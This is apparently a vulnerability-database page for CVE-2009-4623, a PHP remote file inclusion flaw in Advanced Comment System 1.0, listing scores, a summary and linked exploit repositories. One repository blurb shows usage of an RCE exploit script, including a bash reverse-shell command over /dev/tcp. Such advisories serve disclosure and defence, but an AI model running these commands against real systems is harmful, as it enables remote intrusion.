7.5
CVSSv2

CVE-2009-4623

Published: 18/01/2010 Updated: 01/02/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 756
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote malicious users to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

plohni advanced comment system 1.0

Exploits

====================================================== Advanced comment system10 Remote File Inclusion Vulnerability <<!>> Found by : kurdish hackers team <<!>> C0ntact : pshela [at] YaHoo com <<!>> Groups : Kurd-Team <<!>> site : wwwkurdteamorg ===================== ...

Github Repositories

CVE-2009-4623 Advanced Comment System 10 (Reverse Shell) Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 10 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) indexphp and (2) adminphp in advanced_comment_system/ NOTE: this might only be a vulnerability when the administrator has not followed instal

Advanced Comment System 1.0 - Remote Command Execution (RCE)

Advanced Comment System 10 - Remote Command Execution (RCE) nvdnistgov/vuln/detail/CVE-2009-4623 Examples python3 exploitpy 127001 uname -a python3 exploitpy 127001 'bash -i >& /dev/tcp/127001/443 0>&1'

Remote shell on CVE-2009-4623

CVE-2009-4623 Remote shell on CVE-2009-4623: Get a non-interactive shell, open another shell for an advanced use !!! usage: CVE-2009-4623sh [hostname_and_Path] example: CVE-2009-4623sh 192168124/advanced_comment_system/adminphp options: -h this cruft